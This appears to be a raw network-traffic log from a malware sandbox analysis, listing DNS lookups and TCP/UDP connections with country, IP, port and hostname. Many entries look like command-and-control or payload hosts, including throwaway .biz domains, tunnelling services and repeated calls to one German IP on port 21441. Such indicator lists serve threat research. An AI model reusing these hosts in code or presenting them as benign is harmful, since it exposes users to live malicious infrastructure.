US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
US 8.8.8.8:53 acpressions.com udp
FR 142.250.75.226:80 pagead2.googlesyndication.com tcp
US 104.21.77.241:80 acpressions.com tcp
US 8.8.8.8:53 62.71.206.44.in-addr.arpa udp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 104.21.77.241:443 acpressions.com tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 241.77.21.104.in-addr.arpa udp
US 8.8.8.8:53 226.75.250.142.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
RU 31.41.244.9:80 31.41.244.9 tcp
DE 185.218.125.157:21441 tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 funletters.net udp
US 8.8.8.8:53 smileycons.com udp
US 8.8.8.8:53 thundercloud.net udp
US 8.8.8.8:53 www.smileycons.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
FR 216.58.214.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 172.67.213.48:443 fightlsoser.click tcp
US 8.8.8.8:53 66.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 jrqh-hk.com udp
CN 123.136.92.99:80 jrqh-hk.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
IE 185.166.142.22:443 bitbucket.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.25.167:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 167.25.5.3.in-addr.arpa udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 thundercloud.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 www.funletters.net udp
FR 142.250.179.66:443 ep1.adtrafficquality.google tcp
US 208.122.221.162:80 www.funletters.net tcp
DE 185.218.125.157:21441 tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 66.179.250.142.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.30:80 updates.signiant.com tcp
US 8.8.8.8:53 30.121.32.13.in-addr.arpa udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 129.178.250.142.in-addr.arpa udp
FR 142.250.178.129:443 ep2.adtrafficquality.google udp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 251.25.223.76.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 caca.vercel.app udp
US 64.29.17.193:443 caca.vercel.app tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 193.17.29.64.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 162.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 webcdn.triongames.com udp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
US 2.21.72.134:80 webcdn.triongames.com tcp
CN 123.129.219.191:1582 tcp
NL 38.180.123.95:3232 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 wpurl.wpqh.cc udp
HK 47.238.194.17:443 wpurl.wpqh.cc tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 87.120.84.32:80 87.120.84.32 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 17.194.238.47.in-addr.arpa udp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 download.microsoft.com udp
SE 2.21.189.207:80 download.microsoft.com tcp
US 8.8.8.8:53 207.189.21.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
SE 2.21.189.207:443 download.microsoft.com tcp
US 8.8.8.8:53 get.geojs.io udp
US 104.26.0.100:443 get.geojs.io tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 100.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 94.156.177.133:7000 tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.17.90:80 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
SE 2.21.189.207:80 download.microsoft.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
SE 2.21.189.207:443 download.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 208.95.112.1:80 ip-api.com tcp
DE 185.218.125.157:21441 tcp
CN 47.92.192.119:8443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
CN 47.92.192.119:8443 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
FR 141.95.145.210:443 boot.net.anydesk.com tcp
FR 141.95.145.210:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
GB 57.128.141.163:443 relay-ad195ac5.net.anydesk.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 210.145.95.141.in-addr.arpa udp
US 8.8.8.8:53 163.141.128.57.in-addr.arpa udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
NL 38.180.123.95:3232 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 rddissisifigifidi.net udp
BG 195.230.23.72:80 tcp
US 162.159.135.232:443 discord.com tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 clients2.google.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
BG 195.230.23.72:80 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 www.google.com udp
BG 195.230.23.72:80 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 chrome.google.com udp
FR 142.250.179.78:443 chrome.google.com tcp
US 8.8.8.8:53 164.20.217.172.in-addr.arpa udp
FR 172.217.20.206:443 clients2.google.com tcp
US 20.83.148.22:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
IN 43.240.65.55:81 43.240.65.55 tcp
US 8.8.8.8:53 33.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.74.250.142.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 212.113.107.84:80 212.113.107.84 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 84.107.113.212.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
TH 165.154.184.75:80 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
CN 114.55.106.136:80 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
RU 185.215.113.66:80 twizt.net tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 178.132.2.10:4000 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
HK 47.244.167.171:801 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 165.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
N/A 127.0.0.1:8777 tcp
CN 112.124.68.87:2222 tcp
DE 185.218.125.157:21441 tcp
CN 1.94.204.34:4444 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 154.216.17.90:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
KZ 95.59.33.46:40500 tcp
MX 189.252.61.8:40500 udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 8.61.252.189.in-addr.arpa udp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
CN 1.94.204.34:4444 tcp
CN 112.124.68.87:2222 tcp
HK 43.226.125.43:10443 tcp
BG 195.230.23.72:80 tcp
HK 43.226.125.43:10443 tcp
BG 195.230.23.72:80 tcp
CN 39.106.152.236:11443 tcp
CN 39.106.152.236:11443 tcp
US 8.8.8.8:53 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com udp
HK 18.166.176.228:443 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com tcp
HK 18.166.176.228:443 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com tcp
CN 124.220.180.112:2087 tcp
CN 124.220.180.112:2087 tcp
CN 59.110.136.135:380 tcp
US 8.8.8.8:53 43.125.226.43.in-addr.arpa udp
US 8.8.8.8:53 228.176.166.18.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
KZ 88.204.209.230:40500 udp
CN 59.110.136.135:380 tcp
RU 185.215.113.209:80 tcp
US 8.8.8.8:53 230.209.204.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
IR 188.209.32.217:40500 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 adoring-lumiere.94-20-88-63.plesk.page udp
BG 195.230.23.72:80 tcp
AZ 94.20.88.63:80 adoring-lumiere.94-20-88-63.plesk.page tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 63.88.20.94.in-addr.arpa udp
US 8.8.8.8:53 paonancs.cn udp
CA 158.69.12.143:7771 camp.zapto.org tcp
HK 156.225.19.202:80 paonancs.cn tcp
AF 149.54.35.210:40500 udp
RU 185.215.113.67:21405 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
BG 195.230.23.72:80 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 210.35.54.149.in-addr.arpa udp
US 8.8.8.8:53 202.19.225.156.in-addr.arpa udp
RU 80.66.75.114:80 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
MX 201.108.200.21:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 21.200.108.201.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 178.89.183.83:40500 udp
US 8.8.8.8:53 83.183.89.178.in-addr.arpa udp
RU 80.66.75.114:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
AO 129.122.183.25:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 25.183.122.129.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.164.28:40500 udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 28.164.156.90.in-addr.arpa udp
UZ 195.158.22.210:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
IR 5.232.155.0:40500 udp
US 8.8.8.8:53 0.155.232.5.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
GB 20.26.156.215:443 github.com tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
UZ 94.141.69.122:40500 udp
DE 185.218.125.157:21441 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 122.69.141.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
RU 92.244.232.104:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 104.232.244.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
AF 149.54.20.134:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 134.20.54.149.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.54:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 54.160.156.90.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CN 183.57.21.131:8095 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
GT 190.56.14.82:40500 udp
DE 185.218.125.157:21441 tcp
IR 46.248.34.105:40500 tcp
US 8.8.8.8:53 82.14.56.190.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
UZ 90.156.163.10:40500 udp
US 8.8.8.8:53 10.163.156.90.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
RU 94.230.44.71:40500 udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 71.44.230.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
UZ 86.62.3.67:40500 udp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 67.3.62.86.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
MX 189.141.139.39:40500 udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
YE 94.26.219.44:40500 udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 44.219.26.94.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
UZ 89.249.62.7:40500 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.67:21405 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
KZ 88.204.241.182:40500 udp
N/A 127.0.0.1:58963 tcp
US 8.8.8.8:53 182.241.204.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 funletters.net udp
US 208.122.221.162:80 funletters.net tcp
DE 185.218.125.157:21441 tcp
